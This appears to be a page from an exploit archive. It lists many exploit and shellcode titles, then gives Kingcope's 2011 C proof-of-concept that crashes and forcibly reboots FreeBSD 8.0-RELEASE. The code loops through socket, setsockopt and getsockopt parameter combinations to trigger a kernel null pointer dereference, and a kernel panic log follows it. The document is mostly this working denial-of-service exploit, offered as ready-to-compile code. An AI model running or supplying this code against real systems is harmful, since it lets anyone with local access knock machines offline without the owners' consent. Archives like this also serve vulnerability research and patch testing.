880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
68 lines
No EOL
2.5 KiB
C
68 lines
No EOL
2.5 KiB
C
/*
|
|
# Exploit Title: FreeBSD local denial of service - forced reboot
|
|
# Date: 28. January 2011
|
|
# Author: Kingcope
|
|
# Software Link: http://www.freebsd.org
|
|
# Operating System: FreeBSD
|
|
# Tested on: 8.0-RELEASE
|
|
|
|
This source code when compiled and executed
|
|
will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference.
|
|
*/
|
|
|
|
|
|
#include <sys/types.h>
|
|
#include <sys/mman.h>
|
|
#define PAGE_SIZE 4096
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
#include <sys/socket.h>
|
|
main() {
|
|
int k,fd,i2,i3,i4,i5,i6,i7,i8;
|
|
char *p;
|
|
char buf[4096];
|
|
|
|
for (i2=0;i2<256;i2++) {
|
|
for (i3=0;i3<2;i3++) {
|
|
for (i4=0;i4<2;i4++) {
|
|
fd = socket(i2, i3, i4);
|
|
if (fd < 0) continue;
|
|
printf("SUCCESS!\n");
|
|
for (i5=0;i5<100;i5++) {
|
|
for (i6=0;i6<100;i6++) {
|
|
setsockopt(fd, i5, i6, buf, 4);
|
|
getsockopt(fd, i5, i6, buf, &i7);
|
|
}}}}}
|
|
}
|
|
|
|
The crash dump looks like the following.
|
|
|
|
Jan 28 11:33:07 r00tme kernel:
|
|
Jan 28 11:33:07 r00tme kernel:
|
|
Jan 28 11:33:07 r00tme kernel: Fatal trap 12: page fault while in kernel mode
|
|
Jan 28 11:33:07 r00tme kernel: cpuid = 0; apic id = 00
|
|
Jan 28 11:33:07 r00tme kernel: fault virtual address = 0xc
|
|
Jan 28 11:33:07 r00tme kernel: fault code = supervisor
|
|
write, page not present
|
|
Jan 28 11:33:07 r00tme kernel: instruction pointer = 0x20:0xc06143ba
|
|
Jan 28 11:33:07 r00tme kernel: stack pointer = 0x28:0xcd1fa5b4
|
|
Jan 28 11:33:07 r00tme kernel: frame pointer = 0x28:0xcd1fa85c
|
|
Jan 28 11:33:07 r00tme kernel: code segment = base 0x0,
|
|
limit 0xfffff, type 0x1b
|
|
Jan 28 11:33:07 r00tme kernel: = DPL 0, pres 1, def32 1, gran 1
|
|
Jan 28 11:33:07 r00tme kernel: processor eflags = interrupt enabled,
|
|
resume, IOPL = 0
|
|
Jan 28 11:33:07 r00tme kernel: current process = 1004 (bsdcrash)
|
|
Jan 28 11:33:07 r00tme kernel: trap number = 12
|
|
Jan 28 11:33:07 r00tme kernel: panic: page fault
|
|
Jan 28 11:33:07 r00tme kernel: cpuid = 0
|
|
Jan 28 11:33:07 r00tme kernel: Uptime: 2m48s
|
|
Jan 28 11:33:07 r00tme kernel: Cannot dump. Device not defined or unavailable.
|
|
Jan 28 11:33:07 r00tme kernel: Automatic reboot in 15 seconds - press
|
|
a key on the console to abort
|
|
Jan 28 11:33:07 r00tme kernel: Rebooting...
|
|
|
|
The cause of the crash seems to be a specific network driver. Since
|
|
the crash is forced (only?) in a VMWare virtual machine the
|
|
exploitability can be dependent on the loaded device drivers
|
|
and installed hardware. |